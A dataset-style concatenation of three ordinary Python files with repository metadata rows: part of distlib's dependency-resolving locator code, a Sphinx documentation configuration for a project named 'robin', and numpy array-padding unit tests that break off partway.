result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.python.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
#import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if meta_extras and dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
| [
"rossavelrs@yahoo.com"
] | rossavelrs@yahoo.com |
d8ca834b99ba70263bf23cc4cca4378f4ddc1fc7 | 6aee7149a16a71389e0916de1854f4edea026c2b | /docs/conf.py | ec1c141aa03b02802683dd91900e56f31946a7a8 | [
"BSD-2-Clause"
] | permissive | orionzhou/maize | d5e3c66af285d5d3a490fe09e85f840bd033240a | 605c895c397c9f614955a6df8eed0edc553f543d | refs/heads/main | 2022-12-27T02:08:26.747564 | 2022-11-24T07:57:30 | 2022-11-24T07:57:30 | 11,537,821 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,192 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# robin documentation build configuration file, created by
# sphinx-quickstart on Sun Dec 11 23:07:57 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'robin'
copyright = '2016, Peng Zhou'
author = 'Peng Zhou'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinxdoc'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'robindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'robin.tex', 'robin Documentation',
'Peng Zhou', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'robin', 'robin Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'robin', 'robin Documentation',
author, 'robin', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
| [
"zhoupenggeni@gmail.com"
] | zhoupenggeni@gmail.com |
05e23e24877e1c3fee0d86645925b9eededee90d | d77a0d5a18af141d36005eba1769f7384f5ce1d4 | /mDataAn_venv/Lib/site-packages/numpy/lib/tests/test_arraypad.py | fe318a8907d837f134820534f6c890dec499249d | [] | no_license | LukasPolon/MData | 32d756d0df8c8847cf45b8def6e5ef760963d895 | 2178a0b2f60c4c638fd696a6e11b0ef801724bf4 | refs/heads/master | 2022-12-11T15:02:07.528855 | 2018-01-07T16:22:58 | 2018-01-07T16:22:58 | 99,687,079 | 1 | 0 | null | 2021-06-01T22:04:39 | 2017-08-08T11:51:11 | Python | UTF-8 | Python | false | false | 44,328 | py | """Tests for the array padding functions.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import (assert_array_equal, assert_raises, assert_allclose,
TestCase)
from numpy.lib import pad
class TestConditionalShortcuts(TestCase):
def test_zero_padding_shortcuts(self):
test = np.arange(120).reshape(4, 5, 6)
pad_amt = [(0, 0) for axis in test.shape]
modes = ['constant',
'edge',
'linear_ramp',
'maximum',
'mean',
'median',
'minimum',
'reflect',
'symmetric',
'wrap',
]
for mode in modes:
assert_array_equal(test, pad(test, pad_amt, mode=mode))
def test_shallow_statistic_range(self):
test = np.arange(120).reshape(4, 5, 6)
pad_amt = [(1, 1) for axis in test.shape]
modes = ['maximum',
'mean',
'median',
'minimum',
]
for mode in modes:
assert_array_equal(pad(test, pad_amt, mode='edge'),
pad(test, pad_amt, mode=mode, stat_length=1))
def test_clip_statistic_range(self):
test = np.arange(30).reshape(5, 6)
pad_amt = [(3, 3) for axis in test.shape]
modes = ['maximum',
'mean',
'median',
'minimum',
]
for mode in modes:
assert_array_equal(pad(test, pad_amt, mode=mode),
pad(test, pad_amt, mode=mode, stat_length=30))
class TestStatistic(TestCase):
def test_check_mean_stat_length(self):
a = np.arange(100).astype('f')
a = pad(a, ((25, 20), ), 'mean', stat_length=((2, 3), ))
b = np.array(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5,
0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5,
0.5, 0.5, 0.5, 0.5, 0.5,
0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
98., 98., 98., 98., 98., 98., 98., 98., 98., 98.,
98., 98., 98., 98., 98., 98., 98., 98., 98., 98.
])
assert_array_equal(a, b)
def test_check_maximum_1(self):
a = np.arange(100)
a = pad(a, (25, 20), 'maximum')
b = np.array(
[99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99, 99, 99]
)
assert_array_equal(a, b)
def test_check_maximum_2(self):
a = np.arange(100) + 1
a = pad(a, (25, 20), 'maximum')
b = np.array(
[100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100,
1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100]
)
assert_array_equal(a, b)
def test_check_maximum_stat_length(self):
a = np.arange(100) + 1
a = pad(a, (25, 20), 'maximum', stat_length=10)
b = np.array(
[10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10,
1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100]
)
assert_array_equal(a, b)
def test_check_minimum_1(self):
a = np.arange(100)
a = pad(a, (25, 20), 'minimum')
b = np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
)
assert_array_equal(a, b)
def test_check_minimum_2(self):
a = np.arange(100) + 2
a = pad(a, (25, 20), 'minimum')
b = np.array(
[2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2,
2, 3, 4, 5, 6, 7, 8, 9, 10, 11,
12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41,
42, 43, 44, 45, 46, 47, 48, 49, 50, 51,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61,
62, 63, 64, 65, 66, 67, 68, 69, 70, 71,
72, 73, 74, 75, 76, 77, 78, 79, 80, 81,
82, 83, 84, 85, 86, 87, 88, 89, 90, 91,
92, 93, 94, 95, 96, 97, 98, 99, 100, 101,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2]
)
assert_array_equal(a, b)
def test_check_minimum_stat_length(self):
a = np.arange(100) + 1
a = pad(a, (25, 20), 'minimum', stat_length=10)
b = np.array(
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1,
1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
91, 91, 91, 91, 91, 91, 91, 91, 91, 91,
91, 91, 91, 91, 91, 91, 91, 91, 91, 91]
)
assert_array_equal(a, b)
def test_check_median(self):
a = np.arange(100).astype('f')
a = pad(a, (25, 20), 'median')
b = np.array(
[49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5,
0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5]
)
assert_array_equal(a, b)
def test_check_median_01(self):
a = np.array([[3, 1, 4], [4, 5, 9], [9, 8, 2]])
a = pad(a, 1, 'median')
b = np.array(
[[4, 4, 5, 4, 4],
[3, 3, 1, 4, 3],
[5, 4, 5, 9, 5],
[8, 9, 8, 2, 8],
[4, 4, 5, 4, 4]]
)
assert_array_equal(a, b)
def test_check_median_02(self):
a = np.array([[3, 1, 4], [4, 5, 9], [9, 8, 2]])
a = pad(a.T, 1, 'median').T
b = np.array(
[[5, 4, 5, 4, 5],
[3, 3, 1, 4, 3],
[5, 4, 5, 9, 5],
[8, 9, 8, 2, 8],
[5, 4, 5, 4, 5]]
)
assert_array_equal(a, b)
def test_check_median_stat_length(self):
a = np.arange(100).astype('f')
a[1] = 2.
a[97] = 96.
a = pad(a, (25, 20), 'median', stat_length=(3, 5))
b = np.array(
[ 2., 2., 2., 2., 2., 2., 2., 2., 2., 2.,
2., 2., 2., 2., 2., 2., 2., 2., 2., 2.,
2., 2., 2., 2., 2.,
0., 2., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 96., 98., 99.,
96., 96., 96., 96., 96., 96., 96., 96., 96., 96.,
96., 96., 96., 96., 96., 96., 96., 96., 96., 96.]
)
assert_array_equal(a, b)
def test_check_mean_shape_one(self):
a = [[4, 5, 6]]
a = pad(a, (5, 7), 'mean', stat_length=2)
b = np.array(
[[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6]]
)
assert_array_equal(a, b)
def test_check_mean_2(self):
a = np.arange(100).astype('f')
a = pad(a, (25, 20), 'mean')
b = np.array(
[49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5,
0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5]
)
assert_array_equal(a, b)
class TestConstant(TestCase):
def test_check_constant(self):
a = np.arange(100)
a = pad(a, (25, 20), 'constant', constant_values=(10, 20))
b = np.array(
[10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20]
)
assert_array_equal(a, b)
def test_check_constant_zeros(self):
a = np.arange(100)
a = pad(a, (25, 20), 'constant')
b = np.array(
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
)
assert_array_equal(a, b)
def test_check_constant_float(self):
# If input array is int, but constant_values are float, the dtype of
# the array to be padded is kept
arr = np.arange(30).reshape(5, 6)
test = pad(arr, (1, 2), mode='constant',
constant_values=1.1)
expected = np.array(
[[ 1, 1, 1, 1, 1, 1, 1, 1, 1],
[ 1, 0, 1, 2, 3, 4, 5, 1, 1],
[ 1, 6, 7, 8, 9, 10, 11, 1, 1],
[ 1, 12, 13, 14, 15, 16, 17, 1, 1],
[ 1, 18, 19, 20, 21, 22, 23, 1, 1],
[ 1, 24, 25, 26, 27, 28, 29, 1, 1],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1]]
)
assert_allclose(test, expected)
def test_check_constant_float2(self):
# If input array is float, and constant_values are float, the dtype of
# the array to be padded is kept - here retaining the float constants
arr = np.arange(30).reshape(5, 6)
arr_float = arr.astype(np.float64)
test = pad(arr_float, ((1, 2), (1, 2)), mode='constant',
constant_values=1.1)
expected = np.array(
[[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1],
[ 1.1, 0. , 1. , 2. , 3. , 4. , 5. , 1.1, 1.1],
[ 1.1, 6. , 7. , 8. , 9. , 10. , 11. , 1.1, 1.1],
[ 1.1, 12. , 13. , 14. , 15. , 16. , 17. , 1.1, 1.1],
[ 1.1, 18. , 19. , 20. , 21. , 22. , 23. , 1.1, 1.1],
[ 1.1, 24. , 25. , 26. , 27. , 28. , 29. , 1.1, 1.1],
[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1],
[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1]]
)
assert_allclose(test, expected)
def test_check_constant_float3(self):
a = np.arange(100, dtype=float)
a = pad(a, (25, 20), 'constant', constant_values=(-1.1, -1.2))
b = np.array(
[-1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1,
-1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1,
-1.1, -1.1, -1.1, -1.1, -1.1,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
-1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2,
-1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2]
)
assert_allclose(a, b)
def test_check_constant_odd_pad_amount(self):
